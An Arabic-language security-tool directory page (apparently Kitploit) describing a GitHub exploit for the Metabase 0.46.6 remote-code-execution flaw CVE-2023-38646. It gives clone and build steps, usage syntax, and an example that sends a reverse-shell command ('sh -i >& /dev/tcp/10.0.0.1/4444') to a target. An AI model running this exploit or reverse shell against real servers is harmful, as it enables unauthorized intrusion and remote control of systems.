Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — استغلال لثغرة CVE-2023-38646 في Metabase 0.46.6، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات مصممة خصيصًا واسترجاع رمز الإعداد. | Kitploit
أدوات/GitHubGitHub/danithehack3r/cve-2023-38646
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقحصان طروادة للوصول عن بعد
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

استغلال لثغرة CVE-2023-38646 في Metabase 0.46.6، مما يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات مصممة خصيصًا واسترجاع رمز الإعداد.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646

أداة استغلال ثغرة CVE-2023-38646 في Metabase 0.46.6

تستغل هذه الأداة ثغرة أمنية (CVE-2023-38646) في منصة برمجية. تتيح الثغرة تنفيذ أوامر عن بُعد عبر طلب مُصمم بعناية، من خلال استغلال سوء التعامل مع سلسلة اتصال قاعدة البيانات.

نظرة عامة

تقوم الأداة بما يلي:

  • جلب رمز الإعداد (setup token) من عنوان الهدف.
  • ترميز الأمر المُدخل بتنسيق Base64.
  • إنشاء الحمولة (payload) مع الأمر المُرمّز.
  • إرسال الحمولة لاستغلال الثغرة.

التثبيت

استنسخ المستودع:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

الاستخدام

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: عنوان المنصة المراد فحصها واستغلالها. COMMAND: الأمر الذي سيتم تنفيذه على الهدف. PROXY_URL (اختياري): عنوان خادم الوكيل (مثل: http://127.0.0.1:8080). إذا لم يتم توفيره، فلن يتم استخدام أي وكيل.

مثال مع قشرة عكسية (reverse shell) بلغة sh

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض تعليمية وبحثية فقط. تأكد دائمًا من حصولك على إذن مناسب قبل فحص أو استغلال أي هدف. إساءة استخدام هذه الأداة تتعارض تمامًا مع نية المطوّر وقد تكون غير قانونية.

الملاحظات والمساهمات

لا تتردد في فتح قضايا (issues) لأي ملاحظات أو أخطاء أو طلبات ميزات. طلبات السحب (Pull requests) مرحب بها دائمًا!

تنزيل الأداة